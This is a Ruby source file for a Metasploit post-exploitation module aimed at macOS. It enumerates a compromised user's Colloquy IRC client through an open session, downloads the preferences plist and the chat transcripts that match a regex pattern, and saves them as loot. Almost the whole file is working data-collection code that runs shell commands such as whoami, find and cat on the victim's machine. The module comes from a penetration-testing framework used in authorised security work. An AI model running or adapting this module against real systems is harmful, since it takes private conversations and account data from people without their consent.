## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Post include Msf::Post::File def initialize(info={}) super(update_info(info, 'Name' => 'OS X Gather Colloquy Enumeration', 'Description' => %q{ This module will collect Colloquy's info plist file and chat logs from the victim's machine. There are three actions you may choose: INFO, CHATS, and ALL. Please note that the CHAT action may take a long time depending on the victim machine, therefore we suggest to set the regex 'PATTERN' option in order to search for certain log names (which consists of the contact's name, and a timestamp). The default 'PATTERN' is configured as "^alien" as an example to search for any chat logs associated with the name "alien". }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], 'Platform' => [ 'osx' ], 'SessionTypes' => [ "meterpreter", "shell" ], 'Actions' => [ ['ACCOUNTS', { 'Description' => 'Collect the preferences plists' } ], ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ], ['ALL', { 'Description' => 'Collect both the plists and chat logs'}] ], 'DefaultAction' => 'ALL' )) register_options( [ OptRegexp.new('PATTERN', [true, 'Match a keyword in any chat log\'s filename', '^alien']), ], self.class) end # # Parse a plst file to XML format: # http://hints.macworld.com/article.php?story=20050430105126392 # def plutil(filename) exec("plutil -convert xml1 #{filename}") data = exec("cat #{filename}") return data end def get_chatlogs(base) chats = [] # Get all the logs print_status("#{@peer} - Download logs...") folders = dir("\"#{base}\"") folders.each do |f| # Get all the transcripts from this folder trans = exec("find \"#{base}#{f}\" -name *.colloquyTranscript") trans.split("\n").each do |t| fname = ::File.basename(t) # Check fname before downloading it next if fname !~ datastore['PATTERN'] print_status("#{@peer} - Downloading #{t}") content = exec("cat \"#{t}\"") chats << {:log_name => fname, :content => content} end end return chats end def get_preferences(path) raw_plist = exec("cat #{path}") return nil if raw_plist =~ /No such file or directory/ xml_plist = plutil(path) return xml_plist end def save(type, data) case type when :preferences p = store_loot( 'colloquy.preferences', 'text/plain', session, data, "info.colloquy.plist" ) print_good("#{@peer} - info.colloquy.plist saved as: #{p}") when :chatlogs data.each do |d| log_name = d[:log_name] content = d[:content] p = store_loot( 'colloquy.chatlogs', 'text/plain', session, content, log_name ) print_good("#{@peer} - #{log_name} stored in #{p}") end end end def whoami exec("/usr/bin/whoami") end def dir(path) subdirs = exec("ls -l #{path}") return [] if subdirs =~ /No such file or directory/ items = subdirs.scan(/[A-Z][a-z][a-z]\x20+\d+\x20[\d\:]+\x20(.+)$/).flatten return items end def exec(cmd) tries = 0 begin out = cmd_exec(cmd).chomp rescue ::Timeout::Error => e tries += 1 if tries < 3 vprint_error("#{@peer} - #{e.message} - retrying...") retry end rescue EOFError => e tries += 1 if tries < 3 vprint_error("#{@peer} - #{e.message} - retrying...") retry end end end def run if action.nil? print_error("Please specify an action") return end @peer = "#{session.session_host}:#{session.session_port}" user = whoami transcripts_path = "/Users/#{user}/Documents/Colloquy Transcripts/" prefs_path = "/Users/#{user}/Library/Preferences/info.colloquy.plist" prefs = get_preferences(prefs_path) if action.name =~ /ALL|ACCOUNTS/i chatlogs = get_chatlogs(transcripts_path) if action.name =~ /ALL|CHATS/i save(:preferences, prefs) if not prefs.nil? and not prefs.empty? save(:chatlogs, chatlogs) if not chatlogs.nil? and not chatlogs.empty? end end =begin /Users/[user]/Documents/Colloquy Transcripts /Users/[user]/Library/Preferences/info.colloquy.plist Transcript example: /Users/[username]/Documents/Colloquy Transcripts//[server]/[contact] 10-13-11.colloquyTranscript =end